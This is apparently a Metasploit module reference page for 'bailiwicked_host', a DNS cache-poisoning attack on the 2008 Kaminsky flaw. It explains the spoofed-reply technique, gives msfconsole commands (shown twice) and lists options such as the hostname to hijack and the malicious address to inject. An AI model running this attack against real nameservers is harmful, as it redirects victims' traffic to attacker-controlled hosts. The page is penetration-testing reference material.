DNS BailiWicked Host Attack
This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.
Rank
- Normal
Authors
- I)ruid < druid [at] caughq.org >
- hdm < hdm [at] metasploit.com >
Vulnerability References
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > set RHOST [TARGET IP]
msf auxiliary(bailiwicked_host) > set SRCPORT [PORT]
msf auxiliary(bailiwicked_host) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > set RHOST [TARGET IP]
msf auxiliary(bailiwicked_host) > set SRCPORT [PORT]
msf auxiliary(bailiwicked_host) > run
Module Options
| HOSTNAME | Hostname to hijack (default: pwned.example.com) |
| INTERFACE | The name of the interface |
| NEWADDR | New address for hostname (default: 1.3.3.7) |
| RECONS | The nameserver used for reconnaissance (default: 208.67.222.222) |
| RHOST | The target address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| SRCADDR | The source address to use for sending the queries (accepted: Real, Random) (default: Real) |
| SRCPORT | The target server's source query port (0 for automatic) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| TTL | The TTL for the malicious host entry (default: 46047) |
| XIDS | The number of XIDs to try for each query (0 for automatic) (default: 0) |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |